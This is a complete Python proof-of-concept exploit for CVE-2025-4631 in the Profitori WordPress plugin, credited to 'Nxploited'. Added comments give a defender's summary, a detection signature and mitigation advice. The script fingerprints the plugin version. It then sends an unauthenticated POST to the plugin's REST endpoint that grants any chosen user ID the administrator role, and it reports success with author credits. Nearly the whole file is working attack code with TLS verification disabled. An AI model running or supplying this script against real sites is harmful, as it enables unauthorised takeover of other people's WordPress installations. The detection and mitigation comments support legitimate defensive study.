#!/usr/bin/env python3
# Proof-of-concept for CVE-2025-4631 in the Profitori WordPress plugin.
#
# What the script does (defender's summary, all of it visible below):
#   1. GET  <base>/wp-content/plugins/profitori/readme.txt  -> version fingerprint
#   2. POST <base>/wp-json/stocktend/v1/stocktend_object    -> one JSON record
#      of "_datatype": "users" carrying a serialized wp_capabilities value
#      that names the administrator role, sent with NO credentials, cookie
#      or nonce header.
# Detection: the two requests arrive from the same client with the fixed
# desktop-Chrome User-Agent set below, separated by ~3 s (time.sleep(3)), and
# the POST body contains the literal "wp_capabilities".  Mitigation is to
# update the plugin; the request is unauthenticated, so removing readme.txt
# does not help (see the "attempting exploit anyway" branch).
import argparse
import requests
import json
import time
from urllib.parse import urljoin  # imported but never used; paths are built with rstrip("/") + "..." below
import re

# By : Khaled Alenazi (Nxploited)

# Disable SSL warnings
# NOTE(review): combined with session.verify = False this accepts any TLS
# certificate, so the operator's own traffic to the target is interceptable.
requests.packages.urllib3.disable_warnings()

# Setup argument parser
parser = argparse.ArgumentParser(
    description="๐Ÿšจ Exploit for CVE-2025-4631 - Unauthenticated Privilege Escalation in Profitori Plugin\n# By Nxploited (Khaled Alenazi)"
)
# Only -u and -id are mandatory; the remaining fields are written verbatim into the payload.
parser.add_argument("-u", "--url", required=True, help="๐ŸŒ Target base URL (e.g., http://example.com/wordpress)")
parser.add_argument("-id", required=True, type=int, help="๐Ÿ†” User ID to escalate (must exist)")
parser.add_argument("--email", default="admin@hacked.com", help="๐Ÿ“ง Fake user email (optional)")
parser.add_argument("--name", default="Nxploited", help="๐Ÿ‘ค Display name (optional)")
parser.add_argument("--url_field", default="https://github.com/Nxploited/", help="๐Ÿ”— User profile URL (optional)")
parser.add_argument("--verbose", action="store_true", help="๐Ÿ” Enable verbose output and print JSON details")
args = parser.parse_args()

# Set custom session with User-Agent
# The User-Agent is a constant string, so it is a usable log/WAF signature
# for this particular tool; Content-Type is forced to JSON for every request,
# including the readme.txt GET.
session = requests.Session()
session.headers.update({
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36",
    "Content-Type": "application/json"
})
session.verify = False  # certificate validation off for the whole session

# Check version
# Fingerprint step: reads the plugin's public readme.txt and only treats the
# two exact "Stable tag" values 2.0.6.0 and 2.1.1.3 as vulnerable.  Any other
# tag stops the script; a non-200 response or a network error does NOT stop it.
readme_url = args.url.rstrip("/") + "/wp-content/plugins/profitori/readme.txt"
print(f"[๐Ÿ“„] Checking plugin version at: {readme_url}")
try:
    resp = session.get(readme_url)
    if resp.status_code == 200:
        match = re.search(r"Stable tag:\s*(2\.0\.6\.0|2\.1\.1\.3)", resp.text)
        if match:
            print(f"[โœ…] Vulnerable version detected: {match.group(1)}")
            print("[๐Ÿš€] Exploiting in 3 seconds...")
            time.sleep(3)  # fixed delay between the GET and the POST
        else:
            print("[๐Ÿ›ก๏ธ] Plugin version is not vulnerable. Exiting.")
            exit()  # site-module builtin rather than sys.exit(); only exit path besides exceptions
    else:
        # readme.txt missing or blocked: the script continues regardless.
        print("[โš ๏ธ] Version check failed (readme.txt not found), attempting exploit anyway...")
except Exception as e:
    # Broad catch: connection/TLS/timeout errors on the fingerprint are swallowed and the POST still follows.
    print(f"[โš ๏ธ] Error fetching version info: {e}\n[โณ] Proceeding with exploitation...")

# Build payload
# A one-element list: a "users" record keyed by the target user ID.  The
# wp_capabilities value is a PHP-serialized array {"administrator": true};
# email, display name and URL come straight from the CLI arguments.
payload = [
    {
        "_datatype": "users",
        "id": args.id,
        "wp_capabilities": "a:1:{s:13:\"administrator\";b:1;}",
        "user_email": args.email,
        "display_name": args.name,
        "user_url": args.url_field
    }
]

# Manually build API endpoint
# The plugin's REST route.  Nothing authenticating is attached to this
# request (no cookie, Authorization header or X-WP-Nonce), which is the core
# of the issue the CVE describes.
endpoint = args.url.rstrip("/") + "/wp-json/stocktend/v1/stocktend_object"
print(f"[๐Ÿ“ก] Sending privilege escalation request to: {endpoint}")
try:
    # Body is serialized by hand; the session-wide Content-Type header labels it JSON.
    response = session.post(endpoint, data=json.dumps(payload))
    if response.status_code == 200:
        # A 200 alone is reported as success; the response body is then
        # parsed as a JSON list of user records and echoed back.
        print("[๐ŸŽฏ] Exploit completed successfully!\n")
        try:
            parsed = response.json()
            print("[๐Ÿงพ] Updated User Information:")
            for user in parsed:
                print("--------------------------------------")
                print(f"๐Ÿ†” User ID : {user.get('id')}")
                print(f"๐Ÿ‘ค Username : {user.get('user_login')}")
                print(f"๐Ÿ“ง Email : {user.get('user_email')}")
                print(f"๐Ÿชช Display Name : {user.get('display_name')}")
                print(f"๐Ÿ”— User URL : {user.get('user_url')}")
                print(f"๐Ÿ›ก๏ธ Role Raw : {user.get('wp_capabilities')}\n")
        except Exception as json_err:
            # Non-JSON or non-list bodies land here; the run is still reported as a success above.
            print("[โŒ] Could not parse JSON response:", str(json_err))
        if args.verbose:
            print("[Verbose JSON]\n", response.text)
        print("[๐Ÿ‘‘] Exploit By : Nxploited (Khaled_alenazi)")
        print("๐Ÿ”— GitHub : https://github.com/Nxploited")
        print("๐Ÿ“ง Email : NxploitBot@gmal.com")
    else:
        # Any non-200 (e.g. a patched plugin rejecting the unauthenticated write) is reported as failure.
        print(f"[โŒ] Exploit failed. HTTP Status: {response.status_code}")
        if args.verbose:
            print("[Verbose Response]\n", response.text)
except Exception as e:
    # Broad catch for transport-level errors on the POST.
    print(f"[๐Ÿ”ฅ] Error during request: {e}")